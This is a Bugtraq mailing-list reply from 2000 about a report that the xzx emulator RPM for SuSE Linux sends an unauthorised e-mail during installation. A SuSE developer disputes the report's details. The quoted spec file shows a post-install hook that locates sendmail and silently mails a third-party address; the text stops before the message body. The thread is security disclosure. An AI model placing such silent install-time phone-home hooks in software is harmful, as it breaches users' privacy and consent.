Bugtraq mailing list archives

Re: Package xzx-2.9.2-2.i386.rpm spies - SuSE Linux 6.4

From: Andreas Jaeger <aj () SUSE DE>
Date: Mon, 24 Jul 2000 20:20:13 +0200

Gunadi, Prana writes:

System affected:
=====================
SuSE Linux 6.4
Homepage:
http://www.suse.de/en/produkte/susesoft/linux/Pakete/paket_xzx.html

Package name:
=====================
xzx-2.9.2-2.i386.rpm
XZX is a portable emulator of ZX Spectrum 48K/128K/+3

Problem:
=====================
This program tries to send an unauthorized e-mail during its RPM
installation (PRIVACY problem) to <install () fantasy muc de>

PROOF:
=====================
- From the file /usr/src/RPM/SPECS/xzx.spec (the post installation entry)

That paths does not exist under SuSE 6.4, SuSE uses packages instead
of RPM.  Are you sure this comes from SuSE 6.4?  In that case please
send me the complete (!) spec file, I'd like to check it.

Just for the record: I checked the current spec file for the upcoming
SuSE 7.0 release and my CDs of 6.4 - both don't contain the post
section.  I do agree that this shouldn't happen.

Andreas

== xzx.spec (some snipped) ==
%post
set +x
sm=`type sendmail`
if [ $? -eq 0 ]
then
  set ${sm}
  SENDMAIL=$3
else
  SENDMAIL=/usr/sbin/sendmail
fi
if [ -x ${SENDMAIL} ]
then
  ${SENDMAIL} install () fantasy muc de 2>/dev/null <<- _EOF_